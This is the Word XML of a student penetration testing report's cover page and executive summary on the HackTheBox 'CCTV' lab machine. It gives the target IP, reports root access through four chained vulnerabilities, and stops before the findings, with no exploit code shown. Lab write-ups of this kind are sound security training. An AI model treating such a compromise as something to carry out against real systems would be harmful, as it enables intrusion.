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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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0"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3240"/>
            <w:gridCol w:w="3240"/>
            <w:gridCol w:w="3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02">
            <w:pP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03">
            <w:pP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004">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:spacing w:after="60" w:before="120" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="1b2a4a"/>
          <w:sz w:val="88"/>
          <w:szCs w:val="88"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING REPORT</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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="2e75b6"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HackTheBox Machine: CCTV</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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="666666"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Easy  ·  Linux  ·  20 Points</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:spacing w:after="0" w:before="60" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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3240"/>
        <w:gridCol w:w="3240"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3240"/>
            <w:gridCol w:w="3240"/>
            <w:gridCol w:w="3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00A">
            <w:pP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0B">
            <w:pPr>
              <w:spacing w:after="60" w:before="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0C">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:spacing w:after="0" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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4960"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4760"/>
            <w:gridCol w:w="4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00E">
            <w:pPr>
              <w:spacing w:after="60" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="666666"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Presented By</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
            <w:pPr>
              <w:spacing w:after="100" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="1b2a4a"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ryan Musyoki</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
            <w:pPr>
              <w:spacing w:after="40" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Final Year Cybersecurity Project</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
            <w:pPr>
              <w:spacing w:after="40" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Testing Period:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">  12th – 20th April 2026</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
            <w:pPr>
              <w:spacing w:after="40" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="404040"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">  HackTheBox (Academic)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100.0" w:type="dxa"/>
              <w:left w:w="140.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="140.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
            <w:pPr>
              <w:spacing w:after="16" w:before="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="666666"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Target</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="2e75b6"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CCTV Machine</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">
            <w:pPr>
              <w:spacing w:after="12" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">IP: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">10.129.19.244</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
            <w:pPr>
              <w:spacing w:after="12" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Host: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">cctv.htb</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">
            <w:pPr>
              <w:spacing w:after="12" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OS: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ubuntu Linux 24.04 LTS</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
            <w:pPr>
              <w:spacing w:after="12" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Type: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Black Box Penetration Test</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
            <w:pPr>
              <w:spacing w:after="0" w:before="20" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="c00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CLASSIFICATION: CONFIDENTIAL</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:spacing w:after="0" w:before="320" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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0"/>
        <w:gridCol w:w="4860"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="486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1C">
            <w:pPr>
              <w:spacing w:after="20" w:before="80" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OVERALL RISK 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1D">
            <w:pPr>
              <w:spacing w:after="20" w:before="80" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OUTCOME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1E">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="56"/>
                <w:szCs w:val="56"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL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01F">
            <w:pPr>
              <w:spacing w:after="60" w:before="60" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Machine Fully Compromised</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:spacing w:after="70" w:before="140" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="666750"/>
            <wp:effectExtent b="0" l="0" r="0" t="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457200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HackTheBox CCTV Machine — Easy Linux, 3.5 stars, 20 points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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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24">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1.  EXECUTIVE SUMMARY</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:spacing w:after="0" w:before="140" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:spacing w:after="13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report documents a full penetration test conducted against the HackTheBox CCTV machine. Starting with no login credentials or inside knowledge, I was able to fully compromise the system — gaining the highest possible level of access (root). The test was conducted legally within the HackTheBox platform as part of a Final Year Cybersecurity Project.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">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Overall Risk Rating</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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28">
            <w:pPr>
              <w:spacing w:after="20" w:before="100" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL RISK — FULL SYSTEM COMPROMISE</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000029">
            <w:pPr>
              <w:spacing w:after="100" w:before="0" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Root access achieved via a chain of four vulnerabilities. All data on the machine is exposed.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:spacing w:after="0" w:before="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">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Findings — Ordered by Severity (Critical First)</w:t>
      </w:r>
